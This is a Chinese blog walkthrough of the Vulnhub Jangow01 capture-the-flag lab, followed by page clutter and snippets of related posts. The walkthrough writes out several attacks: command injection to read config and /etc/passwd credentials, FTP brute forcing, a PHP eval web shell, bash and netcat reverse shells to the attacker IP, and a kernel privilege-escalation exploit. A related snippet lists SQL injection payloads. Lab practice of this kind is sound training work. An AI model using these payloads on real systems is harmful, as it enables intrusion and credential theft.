【靶场练习】Vulnhub靶场Jangow01-练习记录

已于 2022-02-17 10:07:25 修改
阅读量3.5k 收藏
点赞数
分类专栏: 网络安全 渗透测试 文章标签: 安全 linux web安全
于 2022-02-16 08:15:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36591264/article/details/122955507
版权

Vulnhub靶场Jangow01-练习记录

信息收集

目标机IP:192.168.43.163
攻击机IP:192.168.43.118

端口扫描:nmap -sC -sV 192.168.43.163
在这里插入图片描述
开放21,80两个端口,通过浏览器访问80端口:
在这里插入图片描述
点site后,进入了一个正常的页面
在这里插入图片描述
点击页面上的标签,直到点击右上角Buscar的时候,页面跳转到http://192.168.43.163/site/busque.php?buscar=
buscar作为一个变量,尝试命令传递
http://192.168.43.163/site/busque.php?buscar=ls,有返回信息
在这里插入图片描述
发现有一个wordpress文件夹,查看一下里面的文件信息:
?buscar=ls wordpress,里面有config.php和index.html文件
查看config.php里面的内容:
在这里插入图片描述
得到账号:desafio02,密码:abygurl69
尝试登录系统失败

?buscar=cat /etc/passwd 查看密码信息:
在这里插入图片描述
得到jangow01 desafio02,尝试登录也失败。

将jangow01,desafio02,abygurl69写成一个字典,用nmap尝试爆破:
nmap --script ftp-brute --script-args userdb=user.txt,passdb=user.txt -v 192.168.43.163
爆破成功得到账号:jangow01 密码:abygurl69
可以登陆系统和ftp
uname -a 查看系统版本信息: ubuntu 4.4.0-31

?buscar=cat /home/jangow01/user.txt时,得到一串md5加密的字符串:
d41d8cd98f00b204e9800998ecf8427e
尝试在线md5解密: [空密码]/[Empty String]

尝试通过网页写入后门:
?buscar=echo ‘<?php eval($_POST['xx']);?>’ > 1.php
写完之后成功通过菜刀连接,查看文件,在html文件夹下有.backup文件,里面记录正确的账号密码
在这里插入图片描述

反弹shell

直接bash -i >& /dev/tcp/192.168.43.118/1234 0>&1时,发现系统转换了很多字符
通过菜刀在site文件夹中创建一个shl.php文件,写入如下内容:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.118 443 > /tmp/f');?>

然后浏览器访问http://192.168.43.163/site/shl.php,反弹成功

提权操作

searchsploit ubuntu 4.4.0
发现可用文件45010.c
通过ftp或者菜刀上传到服务器
gcc 45010.c -o exp //生成可执行文件
chmod +x exp //添加exp的执行权限
./exp //执行exp文件
在这里插入图片描述

成功提权,cd /root进入root文件,有proof.txt
cat proof.txt 成功拿到flag
在这里插入图片描述

小白帽的成长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA靶场练习
weixin_43058307的博客
03-16 586
DVWA学习笔记 SQL注入 完全相信用户输入,没有对用户输入进行过滤。 发现SQL注入后, union select 1,datebase()# 爆破库 union select 1,table_name from information_schema.tables where table_name='数据库名#爆破行' union select 1,column_name from information_schema.tables where table_name='列名'#爆破列 union se
BugKuCTF中套路满满的题-------备份是个好习惯
qq_42133828的博客
12-07 3076
首先就点进去是一串字符 d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e 仔细看会发现这是两个一样的字符串,只不过拼接在一起了,MD5解密后的明文是  空 再看题目的标题是备份,那么就看看本网页的备份文件把 输入 123.206.87.240:8002/web16/index.php.bak 注:.bak...
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1102
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
2024年最新Vulnhub内网渗透Jangow01靶场通关(1),2024年最新网络安全-MVP模式详解
2401_84281738的博客
05-11 269
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。连接成功了,也看到了当前站点的文件目录,但是经过测试没有put权限,没有办法上传文件。
bugkuweb题-ctf入门(18-34)
memery_key的博客
05-23 4352
19、备份是个好习惯** //转自 http://www.zjzhhb.com/archives/190 打开网页 d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e 尝试各种解密解码格式都没有效果,可以观察到整个字符串是d41d8cd98f00b204e9800998ecf8427e的两段重复,其实是MD5加密,最后再揭晓。 那现在怎么办呢,按照题目 备 份是个好习惯,是让我们寻找 .bak文件的,也就是说 存在某个文件的
Bugku-CTF (web 持续更新) ——新手ctf记录
xy7850的博客
09-22 2318
目录 1、滑稽 2、计算器 3、GET 4、POST GET和POST的区别: 5、矛盾 6、alert 7、你必须让他停下 1、滑稽 进入场景,发现一堆滑稽表情在飞 直接F12 2、计算器 进入场景,一道数学题,但是只能输入一个数字 F12,可以看到输入框的标签的maxlenth=1 改成2,就可以输入两个数字了,验证就得到了flag 3、GET 进入场景看到php源码,以get请求传入what=flag get,通过拼接url进行传递参
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub20230718最新全部靶场详情 - 共701靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
数据加密 ---- MD5 加密
私房菜
11-13 3342
1. 前言 之前几篇博文详细的介绍了异或加密、AES加密、DES 加密、3DES加密,对于这几种双向加密的算法也有了更多的了解,为了跟后面另一种算法RSA 更好的结合使用,先来介绍一下单向加密中的几个算法,例如MD5、SHA-1、SHA-224、SHA-256等,本文主要分析MD5 算法。   其他算法可以看:数据加密 ---- 总篇   2. 简介 MD5消息摘要算法(英语:MD5 ...
Vulnhub靶机:jangow-01-1.0.1
qq_48904485的博客
01-03 517
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
BUUCTF CYRPTO MD5
ChaoYue_miku的博客
01-01 236
题目名称:MD5 题目类型:Crypto 题目来源:BUUCTF 题目描述:
CTF【解密】字符串flag被加密成已知新字符串,请解密出flag,可以使用Python解码出WriteUp
星如雨落
03-06 9548
CTF-解密: 找出flag task.py # -*- coding: utf-8 -*- assert flag[0:5] == 'flag{' strAlphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(strOld, x, y, n): strNew = '' for i in strOld: if i in strAlphabet:
山东大学软件学院项目实训-创新实训-网络安全靶场实验平台(十四)
番茄炒蛋不加蛋!的博客
06-04 209
前言:本篇博客主要记录XSS漏洞的实现,包括反射型XSS漏洞、存储型XSS漏洞。跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBS
ctf刷题日记
AndrewLi的博客
10-02 591
密码学 BUUCTF MD5 给一段MD5加密后的32位码,使用https://www.cmd5.com/工具对这段码进行破解得到flag md5加密后是16位或者32位的字符,由字母和数字组成,字母大小写统一; 理论上无法解密,除非暴力破解 这里的这个网站就是一个使用暴力破解来解码的网站 BUUCTF 丢失的MD5 1 给一段python源码如下: import hashlib for i in range(32,127): for j in range(32,127):
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2656
迟到的文章,就当库存发出来吧~
vulnhub靶场4:jangow01
Genarior的专栏
04-24 159
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白帽的成长

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值